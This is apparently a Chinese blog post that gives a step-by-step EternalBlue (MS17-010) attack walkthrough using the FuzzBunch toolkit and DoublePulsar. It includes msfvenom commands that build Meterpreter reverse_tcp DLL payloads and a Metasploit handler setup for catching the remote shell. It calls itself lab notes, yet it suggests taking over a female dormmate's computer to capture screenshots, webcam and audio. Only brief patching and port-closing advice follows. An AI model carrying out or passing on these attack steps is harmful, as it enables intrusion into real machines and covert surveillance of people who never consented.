博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
微软EternalBlue永恒之蓝漏洞攻击测试
阅读量:6435 次
发布时间:2019-06-23

本文共 2317 字,大约阅读时间需要 7 分钟。

版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396256

声明:仅供学习交流使用,个人实验笔记。排版比较懒。

微软MS17-010

理论:SMBv1 漏洞攻击,445端口。

环境准备:

攻击资源:攻击工具包

攻击者系统:Windows 7 Ultimate (x64)
受害者系统:Windows 7 Ultimate (x64) ,winXP,win2008,win2003均可。
辅助攻击用系统:kali
推荐虚拟环境构建工具:vmware workstation或oracle Vbox

操作:

1、攻击者环境部署(确保路径全英文):

虚拟机部署win7 64位环境,要么都桥接,要么都选择自定义网络。
下载python2.6并安装
下载pywin32并安装,一定要注意,下载对应python版本
将C:\Python26添加到环境变量PATH中。
将攻击工具包拖入虚拟机,或上传到虚拟机。解压后,里面有个Windows的目录,复制出来到虚拟机的c盘。
新建 listeningposts 目录。

2、受害者环境部署:

受害者系统自选一个就行,随意,安装后,需要和攻击者系统能互相ping通。

3、攻击操作:

攻击者在cmd下运行fb.pytarget IP就是受害者IPcallbackIP就是攻击者的IPUSE redirection输入NObase log 输入 c:\logs或输入NO(是否有日志记录,这个是自愿)接着输入0,新建了一个攻击项目。项目名称随意(英文以外名字可能会报错)。然后输入yes确认其他的直接回车就行了。英文可以用有道翻译。use EternalBlue问你是否要setting。输入yes下面的回车就好,都是默认好的配置。target system,如实选择受害者的系统。mode选择fb,即输入1。剩下的就是yes和回车了。当出现success关键词的时候,说明攻击第一步已经完成了。(失败的原因:1、防火墙的保护。2、杀毒程序的保护。3、网络通信异常。4、人为操作失误。)

部署辅助攻击系统:

1、部署kali,可以和攻击者正常通信即可。2、攻击者安装xshell。3、通过xshell ssh到kali即可。(百度关键词,kali开启和配置ssh服务)4、利用kali 的msf生成后门文件。(LPORT端口参数随意,只要不冲突就行)如果受害者是winXP 32位:msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系统的ip LPORT=19999 -f dll > /tmp/attack.dll如果受害者是win7 64位:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll确认xshell已经连接到了kali,在xshell输入:sz /opt/attack.dll 选择保存在攻击者系统的c盘根目录下即可。xshell下:msfconsoleuse exploit/multi/handler //启用了监听模块受害者是winXP的时候:( set payload windows/meterpreter/reverse_tcpset LHOST kali的ipset LPORT  19999  show options  //看一眼配置run //开启了监听)受害者是win7 64位时:(msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > set lhost kali的ipmsf exploit(handler) > set lport 5555msf exploit(handler) > exploit)在攻击者的cmd下:use Doublepulsar操作系统选择目标的。选择RunDLL路径输入:c:\attack.dll其他各种回车确认。可以看到,xshell连接的kali,收到了会话连接。可以输入whoami或者dir来验证一下。

其他资源(感觉部署环境好麻烦,想来点现成的):

在线现成的环境操作实战:

kali下直接实现攻击利用:

杂谈

一般情况,女生的电脑如果和你在一个网络,比如你们宿舍之间,没有做严格的隔离,那么,理论上讲,可以完整的控制她的电脑,除非她安装了360,为何不说她安装了腾讯管家。因为,对付一些漏洞,需要足够的浪才可以,管家还是太文绉绉了。

(不仅可以截屏,还可以看摄像头,还有录音。另:现网实战前,请阅读:)

预防和其他参考:

360提供了懒人模式的NSA攻击自动检测和防护工具,免安装。

使用防火墙过滤/关闭 137、139、445端口。
对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。
安装微软补丁:请前往微软官方网站下载与自己操作系统匹配的安全补丁进行更新
MS08-067:
MS09-050:
MS10-061:
MS14-068:
MS17-010:

你可能感兴趣的文章
sed 学习笔记(未完成)
查看>>
Eclipse保存验证JS缓慢
查看>>
2017 JMP Discovery Summit China圆满落幕
查看>>
9 Easy Steps for Successful Data Migration
查看>>
人工智能,不止于技术的革命--WOT2017全球创新技术峰会开幕
查看>>
mysql 在大型应用中的架构演变
查看>>
ibm系列文章 --> Windows 到 Linux 之旅
查看>>
linux内存占用过高原因
查看>>
全备份失败后,如何手工清除exchange日志文件,附微软KB
查看>>
java如何连接mysq之源码l讲解
查看>>
企业运维笔试考题(1)
查看>>
Mysql修改存储过程相关权限问题
查看>>
4.2权限管理
查看>>
彻底理解ThreadLocal
查看>>
Node.js~ioredis处理耗时请求时连接数瀑增
查看>>
Linux命令行上执行操作,不退回命令行的解决方法
查看>>
【AngularJS】—— 8 自定义指令
查看>>
零元学Expression Blend 4 - Chapter 36 来玩捉迷藏吧!!!看看ScrollBar的Disabled与Hidden之差异...
查看>>
AlarmManager机制和系统唤醒锁的总结
查看>>
零元学Expression Blend 4 - Chapter 38 看如何使用Clip修出想要的完美曲线(下)
查看>>